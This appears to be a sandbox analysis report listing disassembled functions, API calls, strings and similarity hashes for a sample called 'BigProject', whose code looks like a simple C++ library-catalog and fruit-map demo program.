Opcode ID: 8c9ae8973401c4bfbdb7783963940e2a2c4252cbb26d89466a164da4fab082bf
Instruction ID: 20e1ef0eefaddb055602edca11b441949950a18d09cfd6954a3c3002c5f3e069
Opcode Fuzzy Hash: 8c9ae8973401c4bfbdb7783963940e2a2c4252cbb26d89466a164da4fab082bf
Instruction Fuzzy Hash: 58A13FB1900605CFDB18CF59D9C17AEBBF1FB49328F25962AD925E7250D3789A40CF90

Function 00C1747E Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00C17483
QueryPerformanceFrequency.KERNEL32(?), ref: 00C17491
QueryPerformanceCounter.KERNEL32(?), ref: 00C1749B

Part of subcall function 00C17249: __EH_prolog.LIBCMT ref: 00C1724E

Part of subcall function 00CA275A: __EH_prolog.LIBCMT ref: 00CA275F
Part of subcall function 00CA275A: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00CA28DC

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA,?,?,0000079F,The Catcher in the Rye,J.D. Salinger,?,?,0000078C,Brave New World,Aldous Huxley,?,?,0000079D,1984,George Orwell), ref: 00C175AC
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA,1984,The Catcher in the Rye,1984,1984), ref: 00C1767A
QueryPerformanceCounter.KERNEL32(?), ref: 00C176AF

Part of subcall function 00C171CE: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(?), ref: 00C17218
Part of subcall function 00C171CE: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA), ref: 00C1723D

Strings

1984, xrefs: 00C174C1, 00C175C6, 00C175CE, 00C175F0, 00C1763E
George Orwell, xrefs: 00C174B1
J.D. Salinger, xrefs: 00C1754A
Library Catalog:, xrefs: 00C1759B, 00C17669
The Catcher in the Rye, xrefs: 00C17557, 00C17615
Brave New World, xrefs: 00C1750C
Aldous Huxley, xrefs: 00C174FF

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@$H_prologPerformanceQueryV01@@$Counter$?setstate@?$basic_ios@Frequency
String ID: 1984$Aldous Huxley$Brave New World$George Orwell$J.D. Salinger$Library Catalog:$The Catcher in the Rye
API String ID: 1216514333-2780720062
Opcode ID: 814ec5a83ff7caaeecdb6dcf0aa49f09dda61fc2414e4eec37141f4bf56f85f6
Instruction ID: 058379b03e4a009d2ee153a7ba7ea2f4b29d4c7a900df0b1044fce022e067dc5
Opcode Fuzzy Hash: 814ec5a83ff7caaeecdb6dcf0aa49f09dda61fc2414e4eec37141f4bf56f85f6
Instruction Fuzzy Hash: 9A716F31D0526DDACF05EBA8C899EEDBB79BF27304F444159E80677291DB342A09EB20

Function 00C171CE Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CA275A: __EH_prolog.LIBCMT ref: 00CA275F
Part of subcall function 00CA275A: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00CA28DC

Part of subcall function 00CA275A: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 00CA281A

Part of subcall function 00CA275A: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000), ref: 00CA285E
Part of subcall function 00CA275A: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 00CA288B

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z.MSVCP140(?), ref: 00C17218
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA), ref: 00C1723D

Strings

, Year: , xrefs: 00C17207
Title: , xrefs: 00C171D8
(Available), xrefs: 00C17222
, Author: , xrefs: 00C171F1
(Checked Out), xrefs: 00C17227

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$V01@$??6?$basic_ostream@?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prologV01@@
String ID: (Available)$ (Checked Out)$, Author: $, Year: $Title:
API String ID: 1769822534-3710747714
Opcode ID: 541d9c66a468f5773e650373311529e14b15bcd90ce3ebe6cff22763c55b542f
Instruction ID: 386213a098066d950883438a480cca8d9c05a07c9ab128cbf0f12be580fef083
Opcode Fuzzy Hash: 541d9c66a468f5773e650373311529e14b15bcd90ce3ebe6cff22763c55b542f
Instruction Fuzzy Hash: AAF0CD60B0421213CF08367CA8AA67DB6C7ABDB318B404539A406C7795EE349E128384

Function 00B4118E Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B4118E

Part of subcall function 00CA2C5D: __EH_prolog.LIBCMT ref: 00CA2C62

Part of subcall function 00CA488D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00CA3DC3,00000024,00CA2449,7FFFFFFF,?,?,?,?,?,?,00BFB5F0,?), ref: 00CA48A2

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z.MSVCP140(00000000,00000000,?,?,00000000,?,?,00000000,?,00000003,?,?,00000000,?,?,00000002), ref: 00B4146F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA), ref: 00B4147C

Part of subcall function 00B41139: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set too long,00CA2D4E,?,?,?,?,?,?), ref: 00B4113E

Strings

banana, xrefs: 00B41212
apple, xrefs: 00B411D8
cherry, xrefs: 00B41248

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@H_prologU?$char_traits@$V01@@Xlength_error@std@@malloc
String ID: apple$banana$cherry
API String ID: 3123195358-3927607761
Opcode ID: e2a1d0b65c24306ad1ed0821ad9ff4fbd11cabdbf269589b277d577cd5583351
Instruction ID: 55b519d252a7180160173362be59d5898d0130039117365b2a6b84474d1c60e9
Opcode Fuzzy Hash: e2a1d0b65c24306ad1ed0821ad9ff4fbd11cabdbf269589b277d577cd5583351
Instruction Fuzzy Hash: 18B14B71C0124DDFDB06DFA8D845AEEBBF4BF1A318F148199E4017B2A1DB745A88DB60

Function 00B41189 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00B4118E

Part of subcall function 00CA2C5D: __EH_prolog.LIBCMT ref: 00CA2C62

Part of subcall function 00CA488D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00CA3DC3,00000024,00CA2449,7FFFFFFF,?,?,?,?,?,?,00BFB5F0,?), ref: 00CA48A2

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N@Z.MSVCP140(00000000,00000000,?,?,00000000,?,?,00000000,?,00000003,?,?,00000000,?,?,00000002), ref: 00B4146F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA), ref: 00B4147C

Strings

banana, xrefs: 00B41212
apple, xrefs: 00B411D8
cherry, xrefs: 00B41248

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@H_prologU?$char_traits@$V01@@malloc
String ID: apple$banana$cherry
API String ID: 3395169245-3927607761
Opcode ID: e3360b10dd4ca70a9db0d910beec5c71b7ef92b4e883b939ff250e2cbb0fdba8
Instruction ID: 55064afce9d8bcd9a409a53c58327bad67993e1257d425b1bac8c8bf9c05dac3
Opcode Fuzzy Hash: e3360b10dd4ca70a9db0d910beec5c71b7ef92b4e883b939ff250e2cbb0fdba8
Instruction Fuzzy Hash: B9B14C71C00649DFDB05DFA8D845AEEBBF4BF1A314F148199E4017B2A1DB745A48DB60

Function 00CA275A Relevance: 7.6, APIs: 5, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00CA275F
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 00CA281A
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000), ref: 00CA285E
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 00CA288B
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00CA28DC

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prolog
String ID:
API String ID: 696536955-0
Opcode ID: ab9331dcdcefbce12e21555c265aa684ddc068ff6218d8896b45c345f540f503
Instruction ID: 2cd89893e9ee28d465e224f843ba1f526a06c292b1d46ab1340544ae8273251c
Opcode Fuzzy Hash: ab9331dcdcefbce12e21555c265aa684ddc068ff6218d8896b45c345f540f503
Instruction Fuzzy Hash: D6516075E045269FCB15DFACC8809ACBBB1FF4A328F144219F526E7791D7349A40CB90

Function 00CA3824 Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00CA3829
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 00CA38B4
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000), ref: 00CA38E0
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 00CA3904
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 00CA3958

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?setstate@?$basic_ios@?sputn@?$basic_streambuf@H_prolog
String ID:
API String ID: 696536955-0
Opcode ID: a684296480b839be49a13cab8eb53ac1516023e3cafa64443b3d3481ff8c1102
Instruction ID: 088ff6aa8f27aaea5da6af53f3dd3f6d8662e920e387755f19c06eba597197ae
Opcode Fuzzy Hash: a684296480b839be49a13cab8eb53ac1516023e3cafa64443b3d3481ff8c1102
Instruction Fuzzy Hash: 2C415970A006869FCB20DFA9C5949ADBBF4FF49318B24415AF456EB691C735DF00CB50

Function 00C16ED6 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00C16EDB

Part of subcall function 00CA2C5D: __EH_prolog.LIBCMT ref: 00CA2C62

Part of subcall function 00CA488D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00CA3DC3,00000024,00CA2449,7FFFFFFF,?,?,?,?,?,?,00BFB5F0,?), ref: 00CA48A2

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@M@Z.MSVCP140(?,?,?,00000000,?,00000000,?,?,00000000,?,00000000,?,?,00000000,?,00000101), ref: 00C17142
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA,?,?,?,00000000,?,00000000,?,?,00000000,?,00000000,?,?,00000000,?), ref: 00C1714F

Strings

key, xrefs: 00C16F30

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@H_prologU?$char_traits@$V01@@malloc
String ID: key
API String ID: 3395169245-2324736937
Opcode ID: d3ca753a85cedcdf0cd69f1354ee20a7ef76655c5259baabc078ab6dc0c1c18a
Instruction ID: 161bedda057992ac6432574251fcbab258016fdaf8679bcbe074def4a1eecfb2
Opcode Fuzzy Hash: d3ca753a85cedcdf0cd69f1354ee20a7ef76655c5259baabc078ab6dc0c1c18a
Instruction Fuzzy Hash: FBA16A71C04249EFCB05DFA8C845BEDBBF4AF0A304F258199E4157B2A1DB746E48DB60

Function 00CA3B84 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00CA3B89
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(unordered_map/set too long,00000008,?,00000000,?,?,00000001,00CA26EA,00000000), ref: 00CA3BD2
ceil.API-MS-WIN-CRT-MATH-L1-1-0(0000000C,0000000C,?,00000008,?,00000000,?,?,00000001,00CA26EA,00000000), ref: 00CA3C59

Strings

unordered_map/set too long, xrefs: 00CA3BCD

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: H_prologXlength_error@std@@ceil
String ID: unordered_map/set too long
API String ID: 2095022771-306623848
Opcode ID: 6232d35198be0ecb68eed631156bd605916dfd460542741ea80fd5e1dd2358e3
Instruction ID: 116b8b7c81312dd04fdb34e1d5c8fa48ae32b11434eedf9762591cbeef5f6347
Opcode Fuzzy Hash: 6232d35198be0ecb68eed631156bd605916dfd460542741ea80fd5e1dd2358e3
Instruction Fuzzy Hash: 4E510071A0060ADFCB15DF68C490A6DF7B4FF4A328F20C21AF415B7241D775AA92CB40

Function 00CA553C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 00CA557B
__current_exception_context.VCRUNTIME140 ref: 00CA5585
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA558C

Strings

csm, xrefs: 00CA5546

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 5fc840c2ce577e2f7c85890f3a33143330e61f528387c4e7eacc8c4586238c77
Instruction ID: 9e5737eb22b0dce71f62a0f3e8cada3d4ab9631fbda744f6c37b184bcaaebc4e
Opcode Fuzzy Hash: 5fc840c2ce577e2f7c85890f3a33143330e61f528387c4e7eacc8c4586238c77
Instruction Fuzzy Hash: 78F0A775C04A128FCF30DE69E044019B76EAE133393998D16E454DB610D770EE92C6D2

Function 00CA24A6 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CA24AB
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,00000000,?,00CA27D4), ref: 00CA24DC
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(?,00000000,00000000,?,00CA27D4), ref: 00CA24F7
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000000,00000000,?,00CA27D4), ref: 00CA2504

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: ?good@ios_base@std@@$?flush@?$basic_ostream@D@std@@@std@@H_prologU?$char_traits@V12@
String ID:
API String ID: 2428054142-0
Opcode ID: caf2b955aa3f4a2f701a976ba4d1a27d091ecf9bd3f7926f4e51c63976448656
Instruction ID: a53195f1246e13d22605f8b98f1e8de33963c009bcc61d353090500df4827291
Opcode Fuzzy Hash: caf2b955aa3f4a2f701a976ba4d1a27d091ecf9bd3f7926f4e51c63976448656
Instruction Fuzzy Hash: E6112375701111DFCB18DF5DE598A69FBE4BF6A708718806EE4468BB21C770EA00CB90

Function 00CA2B05 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CA2B0A
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(unordered_map/set too long,00CA26EA,?,00000000,00CA26EA,00000000), ref: 00CA2B5F

Strings

unordered_map/set too long, xrefs: 00CA2B5A

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: H_prologXlength_error@std@@
String ID: unordered_map/set too long
API String ID: 1660897028-306623848
Opcode ID: 7da03235d926b2c690bf5830127f5a5c29008d7d5cd0c123aac426b328d03c46
Instruction ID: 4785684e1ab2bd3a8d8fe2e77d0c037cf320940e23bd675012f8037723b09584
Opcode Fuzzy Hash: 7da03235d926b2c690bf5830127f5a5c29008d7d5cd0c123aac426b328d03c46
Instruction Fuzzy Hash: 9941E07190021ADFCB15DF68D080AADF7F4FF5931CF10861AE456AB241D734AA41DB90

Function 00CA4677 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CA467C
memchr.VCRUNTIME140(?,?,?,}{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+), ref: 00CA4706

Strings

}{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+, xrefs: 00CA4697

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: H_prologmemchr
String ID: }{cdef~hijkl/nopqrstuvwx|><B-DEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+
API String ID: 2811148818-2946796713
Opcode ID: 9d368f281b0a0ed1df090ae4b0bedba463579aa7e84a3416cd78698e2359df1d
Instruction ID: a7f3a21e8f2614a34f015da5e1ee2844abf047e2f21c0f7d34043606508346f5
Opcode Fuzzy Hash: 9d368f281b0a0ed1df090ae4b0bedba463579aa7e84a3416cd78698e2359df1d
Instruction Fuzzy Hash: 6A316D71E0165A9FCB08DFA8D9915BEB7F5FB9A304B24013DE411E3251D7709E04CB50

Function 00C173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA), ref: 00C1743C

Strings

Book is not checked out: , xrefs: 00C1741B
Checked in: , xrefs: 00C1744D

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@
String ID: Book is not checked out: $Checked in:
API String ID: 2302506090-309771757
Opcode ID: 11fd2b7e09c3a417b733364f4a15e7bd9ec013b977dec098e740dc527943b39e
Instruction ID: 2ff83f89978bd6039651b3b68767add7a1daf58c3cfac6b46f555d13b84ac1e4
Opcode Fuzzy Hash: 11fd2b7e09c3a417b733364f4a15e7bd9ec013b977dec098e740dc527943b39e
Instruction Fuzzy Hash: D81127315083428FDB11DE2CD484BEABBE4DFA7318F540259E8E1472A1D630DE89E792

Function 00C17310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON

Download Yara Rule

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(00CA26EA), ref: 00C17398

Strings

Checked out: , xrefs: 00C173A9
Book is not available: , xrefs: 00C17377

Memory Dump Source

Source File: 00000000.00000002.2452759733.0000000000B41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000000.00000002.2452723159.0000000000B40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452943927.0000000000CAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2452967756.0000000000CAD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453024217.0000000000CB2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2453050953.0000000000CB3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b40000_BigProject.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@
